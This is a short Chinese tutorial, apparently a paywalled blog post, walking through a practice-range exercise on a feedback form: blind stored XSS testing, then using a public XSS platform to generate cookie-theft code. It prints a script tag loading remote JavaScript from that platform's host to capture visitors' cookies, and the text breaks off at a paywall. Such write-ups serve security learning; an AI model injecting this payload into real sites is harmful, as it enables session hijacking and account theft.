xss攻击之伪造cookie
靶场地址:
http://59.63.200.79:8004/Feedback.asp
XSS盲打
见框就插,输入进行测试 (若有长度限制则在input框中修改最大长度),点击【提交留言】按钮:

随后自动跳转到查看留言界面:

很明显插入的js代码可直接执行,分别执行了这三段代码

尝试刷新后仍然可执行,由此推断其为存储性XSS

利用XSS公开平台生成漏洞利用代码
xss公开平台:http://xsspt.com
(亦可自己本地搭建获取受害者cookie的源码)
首先注册登录:

创建项目:


如下是我们刚刚创建项目的项目源代码
以及使用方式:

在这里,我使用该行代码插入XSS漏洞处:
<script src=http://xsspt.com/ds4vY6></script>


js恶意代码插入成功,只要访问被插入恶意代码的

本文探讨了XSS攻击中的伪造Cookie问题。通过靶场实例展示了XSS盲打,揭示了存储型XSS漏洞。利用XSS公开平台生成的漏洞利用代码,详细解释了如何插入和执行恶意JS,以窃取访问者信息,包括Cookie。同时,还通过UML图表辅助理解整个攻击流程。
最低0.47元/天 解锁文章
390

被折叠的 条评论
为什么被折叠?



